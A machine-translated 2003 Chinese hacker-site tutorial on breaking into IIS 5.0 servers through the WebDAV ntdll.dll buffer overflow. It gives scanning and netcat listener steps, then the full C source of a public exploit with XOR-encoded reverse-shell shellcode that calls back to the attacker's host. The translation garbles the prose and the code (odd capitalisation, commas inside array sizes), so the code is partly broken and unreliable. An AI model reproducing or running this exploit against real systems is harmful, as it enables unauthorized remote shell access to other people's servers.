Enters the server using the Microsoft newest strict heavy duty WebDAV long-distance buffer overflow loophole! (In view of English version method) |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analysis>> enters the server 
                  using the Microsoft newest strict heavy duty WebDAV 
                  long-distance buffer overflow loophole! (In view of English 
                  version method)  Printing

            Enters the server using the Microsoft newest strict heavy duty 
            WebDAV long-distance buffer overflow loophole! (In view of English 
            version method) 
            Www.cshu.net  2003-4-2  fog rain village 

              issue article 
              issues software 
              contacts with us 
              the home station stated 

              The software downloading | article browsing | mail order service | 
              network marketing | member special area | technology forum | black 
              and white commercial city | on-line game | makes money the 
              alliance | hypothesized main engine main engine to rent 




              Enters the server using the Microsoft newest strict heavy duty 
              WebDAV long-distance buffer overflow loophole! (In view of English 
              version method) 
              --------------------------------------------------------------------------------
              Edition: Arab League spirit origin: Own &#21019; reorganization 
              category: Hacker teaching date: 2003.03.31 today/always glance 
              over: 1.77/777 million 

              Enters the server using the Microsoft newest strict heavy duty 
              WebDAV long-distance buffer overflow loophole! (In view of English 
              version method) 

              This loophole may directly overflow obtains the system highest 
              jurisdiction! ! ! ! 
              This loophole 2003-3-18 issue 
              Issues the date: 2003-03-17 
              Renewal date: 2003-03-18 
              Is affected the system: 
              Microsoft IIS 5.0 
              - Microsoft Windows 2,000 Server SP3 
              - Microsoft Windows 2,000 Server SP2 
              - Microsoft Windows 2,000 Server SP1 
              - Microsoft Windows 2,000 Server 
              - Microsoft Windows 2,000 Professional SP3 
              - Microsoft Windows 2,000 Professional SP2 
              - Microsoft Windows 2,000 Professional SP1 
              - Microsoft Windows 2,000 Professional 
              - Microsoft Windows 2,000 Datacenter Server SP3 
              - Microsoft Windows 2,000 Datacenter Server SP2 
              - Microsoft Windows 2,000 Datacenter Server SP1 
              - Microsoft Windows 2,000 Datacenter Server 
              - Microsoft Windows 2,000 Advanced Server SP3 
              - Microsoft Windows 2,000 Advanced Server SP2 
              - Microsoft Windows 2,000 Advanced Server SP1 
              - Microsoft Windows 2,000 Advanced Server 
              This loophole possibly is front a year had Niu Ren has discovered, 
              but has not always announced, until recently Microsoft left safely 
              announced everybody only then knew originally had such a loophole. 
              Although WebDav is uses this loophole through IIS, but loophole 
              itself certainly is not IIS creates, but is inside a ntdll.dll API 
              function creates. Some meant that, very transfers this API the 
              application procedure all to have this loophole. The entire 
              loophole quotation relations are such: 
              IIS->WebDav->kernel32! GetFileAttributesExW->ntdll! 
              RtlDosPathNameToNtPathName_U (overflow) 
              These days I always pay attention to this aspect the news and the 
              attack code procedure, 
              Everybody attention! ! This loophole attacks the code procedure 
              English version and the Chinese edition is completely different! ! 

              Therefore the method is also different, but the success ratio 
              certainly is not very high.. 
              Is situated between the gravity to consider presently only 
              announces in view of English version attack code and the method, 
              Needs the tool: 
              English overflow code procedure (! Wastes breath!) 
              (Which NC.EXE this doesn't need me to tell you in under!) 
              Also has the webdavscan scanner (black and white to have)! 
              1. First uses webdavscan to sweep to has plants the hole hole the 
              loom (many but success ratio is not high!) 
              2. Then nc -L -vv -p 666 (opens monitors 666 ports) 
              3. With overflow procedure wb.exe which translates < opposite 
              party IP> < your IP> 666 0-3 all tries 
              If luck good used nc to connect 666 again to be allowed directly 
              to enter opposite party main engine the winnt table of contents 
              Under has not needed me to teach? 
              But the present success ratio is not high is because the code just 
              left the reason has not consummated! Perhaps (this also is a good 
              deed! ! Ha-ha! !) 
              The webdav overflow procedure (has translated) 
              /*******************************************************************/ 

              /* [ Crpt ] ntdll.dll exploit trough WebDAV by kralor [ Crpt ] */ 
              /* --------------------------------------------------------------- 
              */ 
              /* this is the exploit for ntdll.dll through WebDAV. */ 
              /* run a netcat ex: Nc -L -vv -p 666 */ 
              /* wb server.com your_ip 6,660 */ 
              /* the shellcode is a reverse remote shell */ 
              /* you need to pad a bit.. the best way I think is launching */ 
              /* the exploit with pad = 0 and after that, the server will be */ 
              /* down for a couple of seconds, now retry with pad at 1 */ 
              /* and so on. pad 2.. pad 3.. if you havent the shell after */ 
              /* something like pad at 10 I think you better to restart from */ 
              /* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */ 
              /* on all the others servers it was at 2,3,4, etc. sometimes */ 
              /* you can have the force with you, and get the shell in 1 try */ 
              /* sometimes you need to pad more than 10 times;) */ 
              /* the shellcode was coded by myself, it is SEH + ScanMem to */ 
              /* find the famous offsets (GetProcAddress).. */ 
              /* I know I code like a pig, my english sucks, and my tech too */ 
              /* it is my first exploit. and my first shellcode. sorry:P */ 
              /* if you have comments feel free to mail me at: */ 
              /* mailto: Kralor@coromputer.net */ 
              /* or visit us at www.coromputer.net. You can speak with us */ 
              /* at IRC undernet channel #coromputer */ 
              /* ok now the greetz: */ 
              /* [ El0d1e ] to help me find some information about the bug:) */ 
              /* tuck_ to support me;) */ 
              /* and all my friends in coromputer crew! Hein les poulets! =) */ 
              /*******************************************************************/ 


              #include <winsock.h> 
              #include <windows.h> 
              #include <stdio.h> 
              #pragma comment (lib, "ws2_32") 
              Char shellc0de [ ] = 
              "\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc" 

              "\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8" 

              "\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33" 

              "\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6" 

              "\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08" 

              "\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64" 

              "\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81" 

              "\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8" 

              "\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b" 

              "\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f" 

              "\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24" 

              "\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd" 

              "\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83" 

              "\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00" 

              "\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d" 

              "\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51" 

              "\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c" 

              "\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56" 

              "\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00" 

              "\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d" 

              "\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d" 

              "\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8" 

              "\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a" 

              "\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20" 

              "\xff\xd0" 
              "CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00" 
              "connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00" 
              "cmd" // dont change anything.. 
              "\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver.. 
              "\x00\x00\xe8\x77" 
              "\x00\x00\xf0\x77" 
              "\x00\x00\xe4\x77" 
              "\x00\x88\x3e\x04" // win2k3 
              "\x00\x00\xf7\xbf" // win9x =P 
              "\xff\xff\xff\xff"; 
              Int test_host (char *host) 
              { 
              Char search [ 100 ] = ""; 
              Int sock; 
              Struct hostent *heh; 
              Struct sockaddr_in hmm; 
              Char buf [ 100 ] = ""; 
              If (strlen (host) >60) { 
              Printf ("error: Victim host too long. \r\n"); 
              Return 1; 
              } 
              If ((heh = gethostbyname (host)) ==0) { 
              Printf ("error: Cant resolve %s ", host); 
              Return 1; 
              } 
              Sprintf (search, "SEARCH/HTTP/1.1\r\nHost: %s\r\n\r\n ", host); 
              Hmm.sin_port = htons (80); 
              Hmm.sin_family = AF_INET; 
              Hmm.sin_addr = * ((struct in_addr *) heh->h_addr); 
              If ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) { 
              Printf ("error: Cant create socket"); 
              Return 1; 
              } 
              Printf ("Checking WebDav on %s...", host); 
              If ((connect (sock, (struct sockaddr *) &hmm, sizeof (hmm))) == 
              -1) { 
              Printf ("CONNECTING_ERROR\r\n"); 
              Return 1; 
              } 
              Send (sock, search, strlen (search),0); 
              Recv (sock, buf, sizeof (buf),0); 
              If (buf [ 9 ] ==4&&buf [ 10 ] ==1&&buf [ 11 ] ==1) 
              Return 0; 
              Printf ("NOT FOUND\r\n"); 
              Return 1; 
              } 
              Void help (char *program) 
              { 
              Printf ("syntax: %s <victim_host> <your_host> <your_port> [ 
              padding ] \r\n ", program); 
              Return; 
              } 
              Void banner (void) 
              { 
              Printf ("\r\n\t [ Crpt ] ntdll.dll exploit trough WebDAV by kralor 
              [ Crpt ] \r\n"); 
              Printf ("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n"); 

              Return; 
              } 
              Void main (int argc, char *argv [ ]) 
              { 
              WSADATA wsaData; 
              Unsigned short port=0; 
              Char *port_to_shell= "", *ip1= "", data [ 50 ] = ""; 
              Unsigned int i, j; 
              Unsigned int ip = 0; 
              Int s, PAD=0x10; 
              Struct hostent *he; 
              Struct sockaddr_in crpt; 
              Char buffer [ 65,536 ] = ""; 
              Char request [ 80,000 ]; // huuuh, what a mess! :) 
              Char content [ ] = 
              "<? Xml version=\ "1.0\"? >\r\n " 
              "<g:searchrequest xmlns:g=\" DAV:\ ">\r\n" 
              "<g:sql>\r\n" 
              "Select \" DAV:displayname\ "from scope () \r\n" 
              "</g:sql>\r\n" 
              "</g:searchrequest>\r\n"; 
              Banner (); 
              If ((argc<4) || (argc>5)) { 
              Help (argv [ 0 ]); 
              Return; 
              } 
              If (WSAStartup (0x0101, &wsaData)! =0) { 
              Printf ("error starting winsock.." ; 
              Return; 
              } 
              If (test_host (argv [ 1 ])) 
              Return; 
              If (argc==5) 
              PAD+=atoi (argv [ 4 ]); 
              Printf ("FOUND\r\nexploiting ntdll.dll through WebDav [ ret: 
              0x00%02x00%02x ] \r\n ", PAD, PAD); 
              Ip = inet_addr (argv [ 2 ]); Ip1 = (char*) &ip; 
              Shellc0de [ 448 ] =ip1 [ 0 ]; Shellc0de [ 449 ] =ip1 [ 1 ]; 
              Shellc0de [ 450 ] =ip1 [ 2 ]; Shellc0de [ 451 ] =ip1 [ 3 ]; 
              Port = htons (atoi (argv [ 3 ])); 
              Port_to_shell = (char *) &port; 
              Shellc0de [ 446 ] =port_to_shell [ 0 ]; 
              Shellc0de [ 447 ] =port_to_shell [ 1 ]; 
              // we xor the shellcode [ xored by 0x95 to avoid bad chars ] 
              __asm { 
              Lea eax, shellc0de 
              Add eax, 0x34 
              Xor ecx, ecx 
              Mov cx, 0x1b0 
              Wah: 
              Xor byte ptr [ eax ], 0x95 
              Inc eax 
              Loop wah 
              } 
              If ((he = gethostbyname (argv [ 1 ])) ==0) { 
              Printf ("error: Cant resolve %s ", argv [ 1 ]); 
              Return; 
              } 
              Crpt.sin_port = htons (80); 
              Crpt.sin_family = AF_INET; 
              Crpt.sin_addr = * ((struct in_addr *) he->h_addr); 
              If ((s = socket (AF_INET, SOCK_STREAM, 0)) == -1) { 
              Printf ("error: Cant create socket"); 
              Return; 
              } 
              Printf ("Connecting..."); 
              If ((connect (s, (struct sockaddr *) &crpt, sizeof (crpt))) == -1) 
              { 
              Printf ("ERROR\r\n"); 
              Return; 
              } 
              // No Operation. 
              For (i=0; I<sizeof (buffer); Buffer= (char) 0x90, i++); 
              // fill the buffer with the shellcode 
              For (i=64000, j=0; I<sizeof (buffer) &&j<sizeof (shellc0de) -1; 
              Buffer=shellc0de [ j ], i++, j++); 
              // well. it is not necessary.. 
              For (i=0; I<2500; Buffer=PAD, i++); 
              /* we can simply put our ret in this 2 offsets.. */ 
              //buffer [ 2,086 ] =PAD; 
              //buffer [ 2,085 ] =PAD; 
              Buffer [ sizeof (buffer) ] =0x00; 
              Memset (request,0, sizeof (request)); 
              Memset (data,0, sizeof (data)); 
              Sprintf (request, "SEARCH /%s HTTP/1.1\r\nHost: 
              %s\r\nContent-type: Text/xml\r\nContent-Length: ", buffer, argv [ 
              1 ]); 
              Sprintf (request, "%s%d\r\n\r\n", request, strlen (content)); 
              Printf ("CONNECTED\r\nSending evil request..."); 
              Send (s, request, strlen (request),0); 
              Send (s, content, strlen (content),0); 
              Printf ("SENT\r\n"); 
              Recv (s, data, sizeof (data),0); 
              If (data [ 0 ]! =0x00) { 
              Printf ("Server seems to be patched. \r\n"); 
              Printf ("data: %s\r\n ", data); 
              } else 
              Printf ("Now if you are lucky you will get a shell. \r\n"); 
              Closesocket (s); 
              Return; 
              } 

              Has the interest to exchange QQ:56690223 





              Original author: ` 
              Origin: ` 
              Altogether has 222 readers to read this article 

              [Tells friend] 
            Previous article:A WEBDAVX overflow success invasion test 

            Next article:The Sophos investigation demonstrated that, The Klez 
            virus still occupied virus's announcement first place 

            - this week popular article - related article 
            In ASP uses the SQL sentence (total collection)
            Opens 3,389 codes (CPP)
            Port greatly entire Chinese edition
            How raises own programming level
            Enters the server using the Microsoft newest strict heavy duty 
            WebDAV long-distance buffer overflow loophole! (In view of English 
            version method) 
            A WEBDAVX overflow success invasion test
            The WebDav long-distance overflow loophole analyzes



      CSHU 
